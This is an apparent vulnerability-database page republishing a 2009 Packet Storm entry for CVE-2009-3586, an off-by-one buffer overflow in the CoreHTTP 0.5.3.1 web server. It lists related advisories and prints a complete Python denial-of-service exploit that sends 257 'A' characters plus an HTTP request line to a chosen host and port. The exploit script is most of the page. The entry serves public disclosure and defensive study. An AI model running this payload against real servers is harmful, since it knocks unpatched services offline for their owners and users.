CoreHTTP 0.5.3.1 Buffer Overflow

🗓️ 07 Dec 2009 00:00:00Reported by Patroklos ArgyroudisType

packetstorm🔗 packetstormsecurity.com👁 40 Views

CoreHTTP 0.5.3.1 Buffer Overflow CVE-2009-358

Reporter	Title	Published	Views	Family All 13
0day.today	CoreHTTP web server off-by-one buffer overflow vulnerability	2 Dec 200900:00	–	zdt
Circl	CVE-2009-3586	2 Dec 200900:00	–	circl
CVE	CVE-2009-3586	8 Dec 200918:00	–	cve
Cvelist	CVE-2009-3586	8 Dec 200918:00	–	cvelist
Exploit DB	CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow	2 Dec 200900:00	–	exploitdb
exploitpack	CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow	2 Dec 200900:00	–	exploitpack
NVD	CVE-2009-3586	8 Dec 200918:30	–	nvd
OpenVAS	CoreHTTP 'src/http.c ' Buffer Overflow Vulnerability	8 Dec 200900:00	–	openvas
OpenVAS	CoreHTTP 'src/http.c ' Buffer Overflow Vulnerability	8 Dec 200900:00	–	openvas
Prion	Buffer overflow	8 Dec 200918:30	–	prion

`#!/usr/bin/env python  
# corex.py -- Patroklos Argyroudis, argp at domain census-labs.com  
#  
# Denial of service exploit for CoreHTTP web server version <= 0.5.3.1:  
#  
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3586  
#  
# For a detailed analysis see:  
#  
# http://census-labs.com/news/2009/12/02/corehttp-web-server/  
  
import os  
import sys  
import socket  
  
def main(argv):  
argc = len(argv)  
  
if argc != 3:  
print "usage: %s <host> <port>" % (argv[0])  
sys.exit(0)  
  
host = argv[1]  
port = int(argv[2])  
  
print "[*] target: %s:%d" % (host, port)  
  
payload = "A" * 257 + "/index.html HTTP/1.1\r\n\r\n"  
  
print "[*] payload: %s" % (payload)  
  
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sd.connect((host, port))  
sd.send(payload)  
sd.close()  
  
if __name__ == "__main__":  
main(sys.argv)  
sys.exit(0)  
  
# EOF  
`

07 Dec 2009 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.09476